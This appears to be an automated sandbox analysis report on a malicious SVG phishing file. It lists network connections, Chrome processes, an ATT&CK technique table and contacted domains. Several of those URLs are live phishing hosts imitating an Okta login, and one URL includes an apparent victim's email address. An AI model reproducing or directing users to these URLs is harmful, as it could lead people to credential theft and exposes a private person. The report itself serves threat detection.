              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 20:34:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgkQmqwPfufmHmBG%2BiDTp8%2FvCFLe3BJbYw7EIUp2l27HsdWaVbzcXhIH0UX4pi3zITlsr%2BB9gD%2FhnhAuxOvIEd8UVByxVK2Itn1t5gBjmixCf8QbbKsDs6GYdadQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=89299&min_rtt=70000&rtt_var=33450&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4228&recv_bytes=2057&delivery_rate=3765&cwnd=33&unsent_bytes=0&cid=83768fd94dadc90e&ts=654&x=0"Server: cloudflareCF-RAY: 9258f2973f864a1a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103865&min_rtt=103750&rtt_var=22070&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1725&delivery_rate=35755&cwnd=231&unsent_bytes=0&cid=096f26666844030e&ts=1413&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 20:34:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WW7aE77epK94I%2BqcNW8rRH6GsNnHFnR%2FpnRWtPUOBC%2BW3mZf562a4arIWhT3KyhE7vTfJRNoMqHbh7uGr14W6oXbXX87Q7t8aFLidVJmcUzkfPDJlc0yrzTaM0sp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=65355&min_rtt=65324&rtt_var=24560&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2059&delivery_rate=43428&cwnd=34&unsent_bytes=0&cid=10d8f1bf455ec7d9&ts=293&x=0"Server: cloudflareCF-RAY: 9258f3358d94c344-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102600&min_rtt=102196&rtt_var=21976&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1726&delivery_rate=36454&cwnd=222&unsent_bytes=0&cid=09eba3a7665bef30&ts=1014&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.29.234:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.248:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.16:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.85.149:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49799 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7020_213955003
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7020_213955003
              Source: classification engineClassification label: mal100.phis.evad.winSVG@20/0@34/183
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\RECIPIENT_DOMAIN_NAME.svg
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2064,i,6778308183566973990,13809267106172008317,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2064,i,6778308183566973990,13809267106172008317,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              12
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://iy8se.zvptaird.ru/UKcxuUr/0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=BGxXsHrasUr3fJlvR8R6dZkeNXLE33Ir9TNznnZVblEYUXurQGTCDNStRhFQz5hKUygq1%2FRcIWLOBKbA9sbHPjOjjFWCv6aeVkxrQHT6pydoIEFtp5AZYup7%2By0c0%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/favicon.ico0%Avira URL Cloudsafe
              https://214w.hxnywi.ru/jawari!upw230%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/fqrVzJ7QK65jRHLycjIYeEjqknYSpo0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=w%2B8qvnHDAflmwziWmRnhTJLq6UqCQogBmNIryRLNDoczCCNlxUgV%2BkzOeW%2F73btqLTFHMMxshs0IZ5nHUlOC65Q8JGWXAU3Tr4rc340lgEd4FhG%2BwhVigG671Itd0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=5YD7g1etXj9egzgarLhNiLMRc3JyQV68yEzOsmQ8X1XvnR117QcG4nRkcBprKz1cHJ1rZSeVv99YBp2SI2eJFkS2kEvTyD5mjJ%2B4dAWH96SZEWnvxlL2iVOT8Jlt0%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXA0%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/stAgM8pQbgeY39sLvNM3QdVigIfOuUymnT3dbGJ3vdGJjthz7pw9e82ef2600%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/56id5k1jcdn8CYj89200%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/klUFkUijZI8I4maIlmmk2KISbvzpmlMHBwASJqop1GyoWwyBN3QjMZ1joZJYwTUQKUEewGU3tab2210%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/rsryoNCzrUl1bJ4h00jRRztjIlnqEseCh1qwZ9uvTMdxXKJkfUJqmtCcd1920%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/mn2PuvbhIFcMJrttWipG93EtklXAmgmrzSR0nYg2b6RtpooVn901460%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/mnEHvdn1lma3Z8sOdlltAtMcHGRU9cMcDgEVOl56x6FVZXhsfhriLH22Suv2200%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/wxMUQbNAaXATujlKA9QopbHH7P1A1BqIlSfnrZ121290%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/ijrrObu1nfXwffheWoHLNm0u1yLcdoW0RNiuM3Bdn5q7QXcd781640%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/34NoRRFidh9TgYIYOlijungyGciExI5Vo0y891050%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/ije3pOU4IZXELEnJ9SQsl7KHlYZLa5jNXqd5ay3wmnqGiK0OQGKe8QplOobs122100%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/qrTJ6QTdDVljK18vstNu7q6r7efiTXfIl0qyGiNa8NrQZ451390%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/xyh5D7hAQpqM0g4ef300%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/gwHj3OKkOhv2tq5VLatsgOER8pOzdGx6oYQYV6RpAhW6P7Tyxe0%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/qrbzLihqqHn3mripsOT5Db20HBuvasjMFehCA0C8VtI0S6ypeD5YyJPwTcd2370%Avira URL Cloudsafe
              https://iy8se.zvptaird.ru/wxv83bmfFs993ZebAr6zux5SnJKV0rVR7L7ElmnyAXnB9Hd7rV1iW6Juab1790%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                214w.hxnywi.ru
                104.21.29.234
                truefalse
                  unknown
                  code.jquery.com
                  151.101.130.137
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.25.14
                    truefalse
                      high
                      github.com
                      140.82.113.3
                      truefalse
                        high
                        get.geojs.io
                        104.26.0.100
                        truefalse
                          high
                          iy8se.zvptaird.ru
                          104.21.112.1
                          truetrue
                            unknown
                            www.google.com
                            142.250.80.100
                            truefalse
                              high
                              d19d360lklgih4.cloudfront.net
                              18.164.124.91
                              truefalse
                                high
                                xpu1hu2cwgnh4mqh5i3tuu4tude80aclh6qmsxfwqmgblrmgdbermbw.xpwqud.ru
                                104.21.85.149
                                truefalse
                                  unknown
                                  objects.githubusercontent.com
                                  185.199.110.133
                                  truefalse
                                    high
                                    ok4static.oktacdn.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://iy8se.zvptaird.ru/UKcxuUr/#Mtroy.tiegs@ocsofl.comfalse
                                        unknown
                                        https://iy8se.zvptaird.ru/GDSherpa-regular.wofffalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                          high
                                          https://iy8se.zvptaird.ru/klUFkUijZI8I4maIlmmk2KISbvzpmlMHBwASJqop1GyoWwyBN3QjMZ1joZJYwTUQKUEewGU3tab221false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iy8se.zvptaird.ru/UKcxuUr/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iy8se.zvptaird.ru/GDSherpa-vf2.woff2false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                            high
                                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                              high
                                              https://iy8se.zvptaird.ru/mn2PuvbhIFcMJrttWipG93EtklXAmgmrzSR0nYg2b6RtpooVn90146false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://iy8se.zvptaird.ru/fqrVzJ7QK65jRHLycjIYeEjqknYSpofalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                high
                                                https://iy8se.zvptaird.ru/GDSherpa-regular.woff2false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/stAgM8pQbgeY39sLvNM3QdVigIfOuUymnT3dbGJ3vdGJjthz7pw9e82ef260false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/rsryoNCzrUl1bJ4h00jRRztjIlnqEseCh1qwZ9uvTMdxXKJkfUJqmtCcd192false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/56id5k1jcdn8CYj8920false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/GDSherpa-bold.wofffalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/mnEHvdn1lma3Z8sOdlltAtMcHGRU9cMcDgEVOl56x6FVZXhsfhriLH22Suv220false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://a.nel.cloudflare.com/report/v4?s=5YD7g1etXj9egzgarLhNiLMRc3JyQV68yEzOsmQ8X1XvnR117QcG4nRkcBprKz1cHJ1rZSeVv99YBp2SI2eJFkS2kEvTyD5mjJ%2B4dAWH96SZEWnvxlL2iVOT8Jltfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/GDSherpa-vf.woff2false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/wxMUQbNAaXATujlKA9QopbHH7P1A1BqIlSfnrZ12129false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://iy8se.zvptaird.ru/ijrrObu1nfXwffheWoHLNm0u1yLcdoW0RNiuM3Bdn5q7QXcd78164false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://a.nel.cloudflare.com/report/v4?s=BGxXsHrasUr3fJlvR8R6dZkeNXLE33Ir9TNznnZVblEYUXurQGTCDNStRhFQz5hKUygq1%2FRcIWLOBKbA9sbHPjOjjFWCv6aeVkxrQHT6pydoIEFtp5AZYup7%2By0cfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                  high
                                                  https://iy8se.zvptaird.ru/GDSherpa-bold.woff2false
                                                  • Avira URL Cloud: safe
                                                  unknown
